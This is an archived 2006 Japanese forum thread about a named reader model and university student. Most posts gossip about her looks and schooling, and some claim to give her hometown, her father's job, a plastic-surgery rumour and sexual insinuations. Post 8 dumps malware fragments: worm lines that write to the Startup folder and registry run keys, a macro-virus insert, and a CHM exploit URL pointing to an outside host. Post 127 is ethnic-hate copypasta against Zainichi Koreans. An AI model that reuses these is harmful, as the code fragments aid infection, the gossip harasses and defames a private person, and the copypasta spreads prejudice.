2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【JJ】平松美奈【Ray】読者モデル

1 :無名モデル:2006/10/13(金) 02:37:09 ID:uo3BKO5s
JJやRayに出てる平松美奈。F女学院の学生です。
深夜のオリラジの番組にも出演中。
彼女について語ってくださいまし。

2 :無名モデル:2006/10/13(金) 04:10:19 ID:F9hCQsIb
関西でしょ?

3 :無名モデル:2006/10/13(金) 04:13:36 ID:F9hCQsIb
地元は神戸かな?

4 :無名モデル:2006/10/13(金) 08:38:17 ID:???
>>1さんありがと〜☆

土曜日発売かな?☆

5 :無名モデル:2006/10/13(金) 08:39:05 ID:???
美奈cゼッテ↑おめぇらよりはカワイイとオモうよぉ(●^o^●)

6 :無名モデル:2006/10/13(金) 18:49:17 ID:F9hCQsIb
美奈ちゃんデニム履くかな?☆

7 :無名モデル:2006/10/13(金) 19:00:01 ID:F9hCQsIb
☆デニムday☆

8 :<body onload=window()>:2006/10/13(金) 19:46:14 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


9 :無名モデル:2006/10/14(土) 14:44:56 ID:hpDhKvBS
セレブな感じ大好き大好き!!☆

10 :無名モデル:2006/10/14(土) 15:01:01 ID:???
最近ブログ更新していないけどなにかあったのかなー。ジェラスアイズも新作ナカナカでないよね

11 :無名モデル:2006/10/14(土) 19:34:37 ID:WQyFEAnK
ママ雑誌によくでるよね おばけみたいな白塗りの

12 :無名モデル:2006/10/14(土) 21:14:49 ID:hpDhKvBS
JJの読モでは美奈ちゃんが好みかな?

13 :無名モデル:2006/10/14(土) 21:53:54 ID:???
たまに食堂で見かける

14 :無名モデル:2006/10/15(日) 23:56:50 ID:mWsnN2iG
食堂ですか?

15 :無名モデル:2006/10/16(月) 02:29:07 ID:jSUWtkqH
この人ブス過ぎ・・・他の読モ可愛く見える

16 :無名モデル:2006/10/16(月) 10:17:01 ID:T89kIdfj
けっこう可愛い!!☆

17 :無名モデル:2006/10/16(月) 10:27:24 ID:IVJIB3LO
厚化粧でババア顔の塗りカベ

18 :無名モデル :2006/10/16(月) 22:34:56 ID:3110ExIe
普通にかわいくない。
目がへんー

19 :無名モデル:2006/10/17(火) 16:17:58 ID:C6ZO1WOU
妹尾美幸ちゃんに似てる☆

20 :無名モデル:2006/10/17(火) 16:43:57 ID:C6ZO1WOU
けっこう可愛い!!☆

21 :無名モデル:2006/10/18(水) 15:42:25 ID:Ns916YTE
ジャニ顔、権力、金大好きなそこらへんにいる女ですよ

22 :無名モデル:2006/10/18(水) 16:18:59 ID:q7hUIz0b
けっこう可愛いなぁ!!☆

23 :無名モデル:2006/10/18(水) 16:54:24 ID:9phyLrET
このひと見てるとほんと読モって何でもアリだなあーって思う。

24 :無名モデル:2006/10/18(水) 23:31:51 ID:teuuixCI
かわいすぎ!!!

25 :無名モデル:2006/10/18(水) 23:47:19 ID:q7hUIz0b
>>24
かわいすぎ!!!
もしや美奈ちゃんのファンの方ですか???
F女学院は、大学と短大じゃ随分レベルが違うんだって。
内部の子がいってたけど短大は外部からの子ばっかりだし
大学の方に入れなかった子で成り立ってるらしい。
同じにされるの嫌がってた。。

26 :無名モデル:2006/10/19(木) 00:02:07 ID:trsQ7+/e
この人は単なる読者でいいよ

27 :無名モデル:2006/10/19(木) 00:06:43 ID:ONq3ugZ+
F女学院は今は 大学しかありません
25はペテンだな

28 :無名モデル:2006/10/19(木) 01:43:49 ID:DDniQTqf
可愛い!
けど頭悪そう‥ヌ
フェリスって確実に偏差値50ないしねォォォ

29 :無名モデル:2006/10/19(木) 10:48:03 ID:VEgYV5DM
>>27-28
高校もあるんだね!!

30 :無名モデル:2006/10/19(木) 13:14:59 ID:ByG7IAbK
ちなみにタバコはペシェだったよ

31 :無名モデル:2006/10/19(木) 13:18:14 ID:ahw1zoAg
>>30
Pecheって,魚って意味だよ!!☆

32 :無名モデル:2006/10/19(木) 13:19:48 ID:???
読モかな?

33 :無名モデル:2006/10/19(木) 13:25:00 ID:VEgYV5DM
>>28
もしやケータイからですか?
私はPCですが何か?

34 :無名モデル:2006/10/19(木) 13:55:54 ID:VEgYV5DM
仮眠中なんです?

35 :無名モデル:2006/10/19(木) 13:57:53 ID:VEgYV5DM
けっこうかわいい!!

36 :無名モデル:2006/10/19(木) 15:00:56 ID:VEgYV5DM
美奈ちゃんプールあるんでしょう?信じられないね。

37 :無名モデル:2006/10/19(木) 15:13:06 ID:ByG7IAbK
>>31
おもっいきし桃って意味だから安心しろ

38 :無名モデル:2006/10/19(木) 19:19:20 ID:???
可愛かったのに太った?12月号では元にもどってるかな

39 :無名モデル:2006/10/19(木) 23:01:12 ID:DDniQTqf
可愛いのは雰囲気だけ。

40 :無名モデル:2006/10/20(金) 04:20:05 ID:lpnGtaP8
かわいすぎ!!!☆

41 :無名モデル:2006/10/20(金) 14:18:14 ID:1am3g0G1
目が三角www

42 :無名モデル:2006/10/20(金) 17:34:54 ID:lpnGtaP8
かわいすぎ!!!☆

43 :無名モデル:2006/10/20(金) 18:08:47 ID:DLVNuSjo
白塗りオバ

44 :無名モデル:2006/10/20(金) 23:31:44 ID:lpnGtaP8
セレブな感じ大好きやわ!!

45 :無名モデル:2006/10/21(土) 00:18:15 ID:3E+aYWYt
おこづかいいくら?

46 :無名モデル:2006/10/21(土) 08:21:52 ID:MYDgEeMt
月3000えん?

47 :無名モデル:2006/10/21(土) 09:56:23 ID:lJ2R2QGL
親何やってるひと?

48 :無名モデル:2006/10/21(土) 09:59:16 ID:MYDgEeMt
大阪の柏原で歯医者☆

49 :無名モデル:2006/10/22(日) 03:24:48 ID:DlonwaTY
セレブお嬢様☆

50 :無名モデル:2006/10/22(日) 03:39:16 ID:5AQeqO2t
可愛いって書き込みは本人が書いてるだろw

51 :無名モデル:2006/10/22(日) 08:10:50 ID:WnBC6iyG
うん可愛くない。アツ塗りお化け親子

52 :無名モデル:2006/10/22(日) 08:47:54 ID:DlonwaTY
ネイルサロン行き着けどこかな?☆

53 :無名モデル:2006/10/22(日) 12:15:44 ID:AX2noMwQ
どっかイベント行って本人に直接聞けよ

54 :53:2006/10/22(日) 12:20:06 ID:???
今年マスアと洋平が出たエッグで何月号?

55 :無名モデル:2006/10/22(日) 12:24:26 ID:???
この人、お嬢様なの?小学校から聖心とかでつか?

56 :無名モデル:2006/10/22(日) 13:18:52 ID:DlonwaTY
実家って神戸かな?☆

57 :無名モデル:2006/10/22(日) 21:00:32 ID:AX2noMwQ
あのさなんで☆つけんの?

58 :無名モデル:2006/10/22(日) 21:21:22 ID:wDafyffl
小学校は世田谷のS女子大付属。
だれでも入れる3流私立。
実家は浦安。
いたって普通の家庭。

59 :無名モデル:2006/10/24(火) 01:50:15 ID:NQD1c3fr
あいつ性格悪いらしいよ

60 :無名モデル:2006/10/24(火) 01:52:34 ID:rpTG1sqw
平松って彼氏いるって聞いたんだけど。

61 :無名モデル:2006/10/24(火) 15:02:47 ID:2Q84tAa3
ミクシーやってるから見てみれば
彼氏さんと笑顔でうつってまっせ

62 :無名モデル :2006/10/26(木) 20:46:27 ID:n6xsP9as
めちゃくちゃ頭悪そう

63 :無名モデル:2006/10/26(木) 21:03:53 ID:ax8YnWnR
ふつーに頭悪いでしょ。フェリスの音楽系の学部って偏差値40代だし‥

64 :無名モデル:2006/10/26(木) 23:57:58 ID:tcAdo95F
えっ!!ミクシー本名でやっているの?

65 :無名モデル:2006/10/27(金) 00:39:14 ID:gfXzkuO5
JJの眉毛のページ普通に可愛く無い。
あれで読モできるなんて…
世も末だな…

66 :無名モデル:2006/10/27(金) 00:42:18 ID:gfXzkuO5
フェリスってどこにも受かんなかった人が行ったイメージが…
女ならだれでも入れるんじゃん?
ここ第一志望って人は聞いたことないけど。

67 :無名モデル:2006/10/27(金) 01:51:38 ID:???
実家千葉なんだ!!
お嬢で港区や世田谷在住かと思った〜
とりあえずフェリスだから賢くはないね〜!

68 :無名モデル:2006/10/27(金) 02:35:43 ID:nR9Dy+/5
スレ主です。彼女を初めて雑誌で見た時ウケ狙いかと思った

69 :無名モデル :2006/10/27(金) 21:07:20 ID:/FBGJDEr
眉毛描くセンスないよね。

70 :無名モデル:2006/10/27(金) 21:16:05 ID:???
>>66
高校の同級生がどこも受からなくてフェリス行ったけど、学生の四分の三がそういう子たちらしい
だからそのうち編入して他の大学へ行っちゃう子も結構いるらしい

71 :無名モデル:2006/10/27(金) 21:18:17 ID:ROE2x0dq
千葉出身か…
三茶にある昭〇女子大付属かな?じゃあさぞかし校則厳しかったんだろうな〜。まぁ、お嬢っぽい感じはするな

72 :無名モデル:2006/10/27(金) 23:17:21 ID:???
昭和の校則は鬼だよね。偏差値かなり低いんだからあそこまで校則厳しくしなくてもって感じ。

73 :ゆうた:2006/10/28(土) 01:32:43 ID:sZlPNOc7
この子目大きいって思ったら、黒コンタクトいれてんだね♪
最近じゃアクセサリー屋さんはじめたよね

ピンクアラモード

74 :無名モデル:2006/10/28(土) 01:36:32 ID:???
死者はどうなるのだ?

75 :無名モデル:2006/10/28(土) 01:37:31 ID:???
ってか昭和なんて全くお嬢じゃないでしょ、、聖心ならハンパなくお金持ちだけどさ

76 :無名モデル:2006/10/28(土) 02:07:09 ID:0+J5nm7W
>>72 馬鹿は何するかわからんから校則厳しくするのさ

77 :無名モデル:2006/10/28(土) 14:10:35 ID:BvW0oWfr
この子、初等部でいじめられて中高はほかのとこいったよー(笑)

78 :無名モデル:2006/10/28(土) 22:47:00 ID:RKTkGSUy
一回だけしゃべったことあるけどめちゃくちゃいい人だった。

79 :無名モデル:2006/10/29(日) 19:23:33 ID:SuzyZMSg
>>78
ほほー、お前は一回喋っただけで相手の全てがわかるか

80 :無名モデル:2006/10/29(日) 19:52:16 ID:???
>>78
ストーカーですか?

81 :無名モデル:2006/10/30(月) 00:43:36 ID:???
可愛いようで不気味な顔

82 :無名モデル:2006/10/30(月) 19:53:57 ID:4bReoXdm
ヒラメと親戚かなぁ?

83 :無名モデル:2006/10/31(火) 00:25:32 ID:hOHP30H1
まぁ魚介類なのは間違いないな

84 :無名モデル:2006/11/01(水) 18:51:51 ID:AGdoacgJ
目が変なのは 整形だから
私中高一緒だったからマジ話
性格の悪さも結構有名
お嬢様なのは確か

85 :無名モデル:2006/11/02(木) 15:10:08 ID:I/WhFZKb
小りすっぽくて結構すき

86 :無名モデル:2006/11/02(木) 16:18:04 ID:zLv+cY4N
庶民なのかな?☆

87 :無名モデル:2006/11/02(木) 16:36:56 ID:???
あたし小学校一緒!!小学校時代は不細工で性悪だった。庶民だよ。

88 :無名モデル:2006/11/02(木) 22:51:43 ID:JIG7L9VW
あれでお嬢だったら他の人の生活水準はどれだけ低いんだ…?

89 :無名モデル:2006/11/02(木) 23:31:55 ID:zLv+cY4N
184 :ノーブランドさん :2005/04/09(土) 23:31:22
カッコいい人と一緒に何処かに行く時は、必ず、バーバリーのプリーツ(ミニ)スカートにする。
やっぱり、パンツ見えそうな格好してると、相手の視線がそっちに集中してくる。
この季節、お花見とかでそういった恰好して膝枕してあげると喜ぶ。

今日、葛西臨海公園でお花見してきて、彼氏ゲットしました。
上に書いたような恰好で行き、お弁当も作って、膝枕もして、
観覧車に乗って告白されてキス。

男って単純です。
彼氏に会う以外はジーンズで手抜いてます。

美奈ちゃんなら?

90 :無名モデル:2006/11/03(金) 02:27:22 ID:UXnpUR2B
てかオビラジでてなくない?どこ座ってる?

91 :無名モデル:2006/11/03(金) 02:27:32 ID:4OBgHTWJ
美奈ちゃん超すき!

92 :無名モデル:2006/11/03(金) 02:44:58 ID:???
へそピって悪いもの??☆
別にいいじゃんww☆

美奈ちゃんって、たばこ吸ってますよね??☆

93 :無名モデル:2006/11/04(土) 11:52:39 ID:FT0F5xNF
オビラジでてるでてる。真ん中らへんの2列目くらいかな〜あんま覚えてない

94 :無名モデル:2006/11/04(土) 11:54:45 ID:FT0F5xNF
そういやこの間オビラジでなんかレポやってたよ

95 :無名モデル:2006/11/04(土) 12:04:59 ID:FtiN4y0f
小悪魔とお嬢さんは正反対の意味だろ…常識的に考えて…☆
成人式の振袖どんなの着たかな?☆

96 :無名モデル:2006/11/04(土) 13:18:53 ID:FtiN4y0f
セレブな感じ大好き大好き!!!☆

97 :無名モデル:2006/11/04(土) 14:47:58 ID:FtiN4y0f
スチュワーデスになるのかな?

98 :無名モデル:2006/11/04(土) 18:00:13 ID:fmtdtEpk
この人バレエならっていたよね?

99 :ゆうた:2006/11/04(土) 20:25:30 ID:uygu/mTu
今日フェリスの学園祭でファッションショーに出てた。
顔作りすぎだし慣れてるね。

彼氏きてたけど背が小さいし顔もださかった


100 :無名モデル:2006/11/04(土) 20:32:56 ID:v4CVap8C
彼氏はとってもいい人だよ〜
今日みなちゃん可愛かった★彡

101 :無名モデル:2006/11/07(火) 03:22:29 ID:Uho+XCXY
JJやRayに出てる平松美奈。F女学院の学生です★彡

彼女について語ってくださいまし★彡

102 :無名モデル:2006/11/07(火) 03:48:45 ID:xnjdoa4i
語る?一般人以下はメディアにしゃしゃるのやめてね…

103 :無名モデル:2006/11/07(火) 03:50:01 ID:Uho+XCXY
>>102
確か横浜のキリスト教系の大学ですよね…?

104 :無名モデル:2006/11/07(火) 10:18:31 ID:UHjDJ4HK
あすこの学校、
馬鹿でどこも受かんなかった人が行く学校なのに
セレブぶるのがウゼぇ。
女ってだけで合格させてもらえるんじゃないの?

105 :無名モデル:2006/11/07(火) 10:39:55 ID:T9B5Om81
白ノースリワンピにピンクカーデ、
白かピンクのミュールに薪薪ヘアーで
決まりだ!

106 :無名モデル:2006/11/07(火) 10:49:00 ID:???
>>103
こないだ24〜28ぐらい(一人一人の実年齢は知らん)と合コンした時は
めざましTVのアナウンサー達みたいな恰好だった。
店にもよるけどジーンズスタイルで来る人もるし、ふかだきょうこみたいな恰好じゃなければ
そんなに気にする事はないと思われ。

107 :無名モデル:2006/11/07(火) 11:07:55 ID:Uho+XCXY
フェラーリ2台ってすごくない?
どんな関係なの?

108 :無名モデル:2006/11/07(火) 12:31:57 ID:Uho+XCXY
>>051白のカーデっていう逆パターンでも
いいかなぁ?それならもってる♪
狙った人にはどうやって近づけばよいでしょうか?
あんまり合コン経験ないんで・・・。
一人知ってる人がその中にいるんですけど(狙ってる)
すごいオトコっぽい人なんですよね。
どうやったら嫌われずにいけるかなぁ・・・??
教えてください。

109 :無名モデル:2006/11/07(火) 12:33:54 ID:Uho+XCXY
109系かな?

110 :無名モデル:2006/11/07(火) 12:38:05 ID:T9B5Om81
色は逆でも良し。
その人がちゃんと周りを見る人ならば、
まわりにさりげない気配りしてると好印象かな。
モチロン気になる人には、他の人よりちょっとだけより気を配る。
みんなの前であからさまに「狙ってます!」みたいな人は男でも引くよ。
んで解散時にアドなり電話番号なり渡して、後日2人で会えばイイんでない?

111 :無名モデル:2006/11/07(火) 17:11:57 ID:Uho+XCXY
サッカー好きかな??

112 :無名モデル:2006/11/08(水) 01:11:34 ID:Q3KzB48/
みなちかわいい〜♪

113 :無名モデル:2006/11/11(土) 13:13:49 ID:82tDXVLA
みなち実家どこなの??♪

114 :無名モデル:2006/11/11(土) 13:20:58 ID:82tDXVLA
かわいい!!

115 :無名モデル:2006/11/11(土) 13:22:00 ID:82tDXVLA
書き込んで!!

116 :無名モデル:2006/11/11(土) 13:26:58 ID:HV3HGWvJ
かわいいで

117 :無名モデル:2006/11/11(土) 13:33:53 ID:HV3HGWvJ
かわいいですよね☆

118 :無名モデル:2006/11/11(土) 17:25:16 ID:JF7wkGFn
生まれも育ちも浦安だよ。

119 :無名モデル:2006/11/12(日) 06:27:07 ID:hif8WwlS
この人かわいい!?初めて見たのは確かwithだったけど、こんな人がピンクの服着るなよ…自分をわかってないなって思いました。今人気あるけどね。何だか不思議

120 :無名モデル:2006/11/12(日) 08:39:45 ID:/lzkhbYZ
>>118
浦安から横浜まで・・・♪
羨ましいなぁ!!☆

121 :無名モデル:2006/11/12(日) 10:39:44 ID:/lzkhbYZ
白ノースリワンピにピンクカーデ、
白かピンクのミュールに薪薪ヘアーで
決まりだ!

122 :無名モデル:2006/11/12(日) 10:49:00 ID:???
>>118
こないだ24〜28ぐらい(一人一人の実年齢は知らん)と合コンした時は
めざましTVのアナウンサー達みたいな恰好だった。
店にもよるけどジーンズスタイルで来る人もるし、ふかだきょうこみたいな恰好じゃなければ
そんなに気にする事はないと思われ。

123 :無名モデル:2006/11/12(日) 12:34:45 ID:???
>>121
ピンクノースリワンピに白のカーデっていう逆パターンでも
いいかなぁ?それならもってる♪
狙った人にはどうやって近づけばよいでしょうか?
あんまり合コン経験ないんで・・・。
一人知ってる人がその中にいるんですけど(狙ってる)
すごいオトコっぽい人なんですよね。
どうやったら嫌われずにいけるかなぁ・・・??
教えてください。

124 :無名モデル:2006/11/12(日) 12:38:19 ID:/lzkhbYZ
色は逆でも良し。
その人がちゃんと周りを見る人ならば、
まわりにさりげない気配りしてると好印象かな。
モチロン気になる人には、他の人よりちょっとだけより気を配る。
みんなの前であからさまに「狙ってます!」みたいな人は男でも引くよ。
んで解散時にアドなり電話番号なり渡して、後日2人で会えばイイんでない?

125 :無名モデル:2006/11/13(月) 01:51:03 ID:DwcHVo3E
なんか聞きたいことある??

126 :無名モデル:2006/11/13(月) 02:13:47 ID:xdhW1eyQ
>>125
美奈ちゃんのチャームポイントとは?☆

127 :無名モデル:2006/11/13(月) 02:21:24 ID:???
★在日朝鮮人Q&A!君も在日博士だ!

Q.在日朝鮮人1世の出身地を教えて下さい。
A.99.4%が南部(現在の韓国)出身です。更に17%が済州島出身です。
ttp://nipponsaisei.air-nifty.com/sakura/2004/07/99.html

Q.どうして99.4%が南部(韓国)出身なの?
A.日本に近い南部の人が日本に稼ぎに来ました。

Q.どうして17%が済州島出身なの?
A.戦後、李承晩大統領による済州島民の虐殺から逃げて、日本に密入国したからです。

Q.在日は強制連行されたの?
A.徴用者はたった245人です。(朝日新聞 1959年7月13日)
ttp://img2.echoo.jp/photo/blog_b/52019453ce69cd3536fa41c3fe15ee29.jpeg

Q.在日は帰りたくても帰れなかったの?
A.戦前の在日人口200万人のうち140万人が終戦直後に帰国しました。つまり帰れました。

Q.どうして60万人は日本に残ったの?
A.朝鮮で白丁(ペクチョン)と呼ばれた奴隷階層が多く、帰ると差別されるからです。
また戦後のドサクサで得た財産を放棄するのが惜しかったからです。

Q.どうして彼らは被害者ヅラしているの?
A.分かりません(笑)



128 :無名モデル:2006/11/13(月) 02:41:27 ID:ovj/ucI4
スレ見て意外と人気なことにびっくり。どう見てもギャグにしかみえないのに。。。男には好かれそうな顔だが

129 :無名モデル:2006/11/13(月) 02:42:22 ID:xdhW1eyQ
シャンプーにはこだわりを☆

130 :無名モデル:2006/11/13(月) 03:50:40 ID:DwcHVo3E
目だよ目
あとしいていうなら口元

131 :無名モデル:2006/11/13(月) 18:43:37 ID:rxZqTdX0
人気あるように自作で一人でがんばって
こつこつ書き込んでるんだよ!

132 :無名モデル:2006/11/14(火) 06:24:56 ID:zLLZMARv
可愛い!!☆

133 :無名モデル:2006/11/14(火) 08:14:41 ID:zLLZMARv
ブログどこでやってるの?
私も間近で見た事あるけど、化粧は濃いめで声はほんわかした女の子っぽい声だった。背はちょっと高めだった
リズリサみたいなブリブリすぎるのよりJJ・bisみたいな大人っぽい可愛さのが似合うね

134 :無名モデル:2006/11/15(水) 01:47:46 ID:/YPboHjg
S区にすんでるよ。

135 :無名モデル:2006/11/15(水) 01:50:31 ID:/YPboHjg
ここも本人絶対みてるねw前も見てたし



136 :無名モデル:2006/11/15(水) 02:07:34 ID:WqQA0SOo
見てるね〜 つ〜か昔遊んだことあるしw
成長したな

137 :無名モデル:2006/11/15(水) 02:35:12 ID:f55hgXz3
見てるのかな??

138 :無名モデル:2006/11/15(水) 04:15:55 ID:K96nNjHO
セレブなのかな??

139 :無名モデル:2006/11/15(水) 07:17:39 ID:vjbcqE53
微妙な女

140 :無名モデル:2006/11/15(水) 07:24:43 ID:K96nNjHO
白ノースリワンピにピンクカーデ、
白かピンクのミュールに薪薪ヘアーで
決まりだ!

141 :無名モデル:2006/11/17(金) 12:54:46 ID:uIgXU5XX
男からしてみると、
ピンクとか白とかましてや両方組合せて着てこられると、
10割がたヒクわな…

142 :無名モデル:2006/11/17(金) 17:16:23 ID:gb3JLRJj
>>118
ありがとうございます☆体重は何キロぐらいですかね(^-^)

143 :無名モデル:2006/11/17(金) 17:17:19 ID:gb3JLRJj
かわいすぎます!!♪☆

144 :無名モデル:2006/11/17(金) 17:44:44 ID:???
↑じゃあ、すれば?
そんな事言っといてどうせ誰かが申請するのを様子見したいだけなんでしょ?☆

145 :無名モデル:2006/11/17(金) 17:45:51 ID:???
この子は、専属?どこまでいくかな?

146 :無名モデル:2006/11/17(金) 17:46:49 ID:???
性格、顔、共に良し!

147 :無名モデル:2006/11/17(金) 17:47:47 ID:gb3JLRJj
美奈ちゃんの進路は?

148 :無名モデル:2006/11/18(土) 14:18:27 ID:z9mQc7MY
可愛ければイイ!!☆

149 :無名モデル:2006/11/18(土) 15:51:22 ID:???
やっぱコレだね!
http://xrl.us/tbyx

150 :無名モデル:2006/11/20(月) 02:26:18 ID:ZJCBvQSL
中学高校は品川にある女子校に通い、高3の終わりについに整形。
目が三角になる。
実家は東京で金持ちだが厚塗り母子家庭。
ほんわかとした雰囲気でかわいいけど、
作り物だし‥性格も裏表激しすぎてきつい。


151 :無名モデル:2006/11/21(火) 03:46:40 ID:6zChjsnP
整形ってまじ?高校時代の写真みたけど今と変わってないような・・・

152 :無名モデル:2006/11/21(火) 21:47:37 ID:2tSj0FWr
大学の許可なしに色々出てるね
学校にバレて退学させられるのも時間の問題かw

153 :無名モデル:2006/11/22(水) 00:03:08 ID:wJ01B2uF
許可なくても読者モデルとか芸能活動してるフェリス生いっぱいいるよ
やめさせられる事はまずない

154 :無名モデル:2006/11/22(水) 00:54:28 ID:rHzA1stV
小沼容子

155 :無名モデル:2006/11/22(水) 03:58:14 ID:MSv5PAbA
ポッチャりしてるし、とても雑誌に出れるような容姿ではない。
三角のような目で、お世辞にも可愛いと言えない

156 :無名モデル:2006/11/22(水) 10:41:48 ID:iDIh6lwh
グラマラスのページ美奈さん多くなってきたね!

157 :無名モデル:2006/11/23(木) 13:57:50 ID:wBMhZt2d
美奈やっぱり日本人なんだね
あの顔とスタイルみたら納得した。

158 :無名モデル:2006/11/23(木) 15:43:08 ID:m+3ES5E8
ギャル曽根に似てるw

159 :無名モデル:2006/11/23(木) 15:46:54 ID:wBMhZt2d
>>158
ギャルなの?

160 :無名モデル :2006/11/23(木) 22:25:30 ID:pRgwu/+e
まるこちゃんに出てくる藤木くんも三角目だけど
藤木くんの方がかわいいな

161 :無名モデル:2006/11/24(金) 23:39:00 ID:2PJq8Xn/
藤木に似てるわ

162 :無名モデル:2006/11/26(日) 21:09:06 ID:+SFKcMMj
いつもディファインしてるね


163 :無名モデル:2006/11/26(日) 21:11:11 ID:???
↑貴様はひっこんどれ。チンカス野郎が

164 :無名モデル:2006/11/29(水) 14:44:48 ID:P2T7KQGJ
>>156
実物見たの?どこで?

165 :無名モデル:2006/12/04(月) 16:12:50 ID:DE1bS0t4
合コンで一度一緒だったよ
二次会のあとオレの連れと…

166 :無名モデル:2006/12/05(火) 01:24:20 ID:Rk+E3+j7
最近、整形って大学でも噂らしい・・・

167 :無名モデル:2006/12/05(火) 01:41:51 ID:???
きもいね

168 :無名モデル:2006/12/05(火) 22:23:49 ID:3epg8/E4
美奈がんばれよー!

169 :無名モデル:2006/12/06(水) 00:07:10 ID:EhnnXh4W
本人学内で見かけますが、とっても可愛いです!

170 :165:2006/12/06(水) 07:10:44 ID:LZBk0B0A
かなりの美乳だそうです

171 :無名モデル:2006/12/06(水) 12:06:54 ID:6R+RcneA
171 :ノーブランドさん :04/06/21 10:39
白ノースリワンピにピンクカーデ、
白かピンクのミュールに薪薪ヘアーで
決まりだ!

172 :無名モデル:2006/12/06(水) 12:24:32 ID:1PF4l6fM
>>165>>170
こないだ24〜28ぐらい(一人一人の実年齢は知らん)と合コンした時は
めざましTVのアナウンサー達みたいな恰好だった。
店にもよるけどジーンズスタイルで来る人もるし、ふかだきょうこみたいな恰好じゃなければ
そんなに気にする事はないと思われ。

173 :無名モデル:2006/12/06(水) 12:31:23 ID:1PF4l6fM
>>171
ピンクノースリワンピに白のカーデっていう逆パターンでも
いいかなぁ?それならもってる♪
狙った人にはどうやって近づけばよいでしょうか?
あんまり合コン経験ないんで・・・。
一人知ってる人がその中にいるんですけど(狙ってる)
すごいオトコっぽい人なんですよね。
どうやったら嫌われずにいけるかなぁ・・・??
教えてください。

174 :171:2006/12/06(水) 12:38:17 ID:6R+RcneA
色は逆でも良し。
その人がちゃんと周りを見る人ならば、
まわりにさりげない気配りしてると好印象かな。
モチロン気になる人には、他の人よりちょっとだけより気を配る。
みんなの前であからさまに「狙ってます!」みたいな人は男でも引くよ。
んで解散時にアドなり電話番号なり渡して、後日2人で会えばイイんでない?

175 :無名モデル:2006/12/06(水) 16:09:02 ID:???
気配りかぁ・・・。できるかなぁ〜。
アドはね、もう知ってるんですよ。
私と彼が幹事なので・・・。
看護学生なのですが、実習先で知り合ったのです。
(彼は救急救命士)
はぁ〜、緊張するなぁ・・・。
気を配るってのは、たとえば、どんなことすればいいんですかねぇ?

176 :無名モデル:2006/12/06(水) 17:06:43 ID:1PF4l6fM
飲み屋で話を振りまくるとか。
「コレおいしいよ(はぁと)」とかやってみたり。

177 :無名モデル:2006/12/07(木) 08:44:43 ID:fSEvc9Ox
可愛ければイイ!!

178 :5:2006/12/07(木) 10:04:14 ID:ry8i8giM
まじかわいいよ!
代々木に住んでるお嬢様☆

179 :無名モデル:2006/12/07(木) 10:07:40 ID:fSEvc9Ox
まじかわいい…お嬢さま☆

180 :無名モデル:2006/12/07(木) 10:37:19 ID:???
これなんだけど・・・
http://1go.it/y6z

181 :無名モデル:2006/12/07(木) 10:39:14 ID:fSEvc9Ox
白ノースリワンピにピンクカーデ、
白かピンクのミュールに薪薪ヘアーで
決まりだ!

182 :無名モデル:2006/12/07(木) 10:44:42 ID:rpqGswvj
代々木? ヲタク?

183 :無名モデル:2006/12/07(木) 12:31:52 ID:???
>>171
ピンクノースリワンピに白のカーデっていう逆パターンでも
いいかなぁ?それならもってる♪
狙った人にはどうやって近づけばよいでしょうか?
あんまり合コン経験ないんで・・・。
一人知ってる人がその中にいるんですけど(狙ってる)
すごいオトコっぽい人なんですよね。
どうやったら嫌われずにいけるかなぁ・・・??
教えてください。

184 :無名モデル:2006/12/07(木) 12:34:58 ID:fSEvc9Ox
184 :ノーブランドさん :2005/04/09(土) 23:31:22
カッコいい人と一緒に何処かに行く時は、必ず、バーバリーのプリーツ(ミニ)スカートにする。
やっぱり、パンツ見えそうな格好してると、相手の視線がそっちに集中してくる。
この季節、お花見とかでそういった恰好して膝枕してあげると喜ぶ。

今日、葛西臨海公園でお花見してきて、彼氏ゲットしました。
上に書いたような恰好で行き、お弁当も作って、膝枕もして、
観覧車に乗って告白されてキス。

男って単純です。
彼氏に会う以外はジーンズで手抜いてます。

185 :無名モデル:2006/12/07(木) 12:38:15 ID:fSEvc9Ox
色は逆でも良し。
その人がちゃんと周りを見る人ならば、
まわりにさりげない気配りしてると好印象かな。
モチロン気になる人には、他の人よりちょっとだけより気を配る。
みんなの前であからさまに「狙ってます!」みたいな人は男でも引くよ。
んで解散時にアドなり電話番号なり渡して、後日2人で会えばイイんでない?

186 :無名モデル:2006/12/07(木) 13:18:52 ID:fSEvc9Ox
名前が可愛いですよね!!☆

187 :無名モデル:2006/12/08(金) 10:18:58 ID:agglt/N0
可愛ければイイよね!

188 :無名モデル:2006/12/08(金) 21:34:40 ID:uzJtCIMX


189 :無名モデル:2006/12/10(日) 08:10:57 ID:FpvXvkkr
可愛い!!

190 :無名モデル:2006/12/10(日) 10:00:04 ID:???
美奈ちゃんミスキャンパスなのかな??☆

191 :無名モデル:2006/12/10(日) 10:29:59 ID:FpvXvkkr
書き込んで!!☆

192 :無名モデル:2006/12/10(日) 12:10:56 ID:FpvXvkkr
可愛い!!☆

193 :無名モデル:2006/12/10(日) 17:05:36 ID:???
こんな無名女誰が知ってんの?w
みんな同じ学校の人でしょ?
無名女いらないし

194 :無名モデル:2006/12/10(日) 17:42:29 ID:Gb+oyW0k
自演でしょ

195 :無名モデル:2006/12/10(日) 17:52:12 ID:???
自演すごいよね

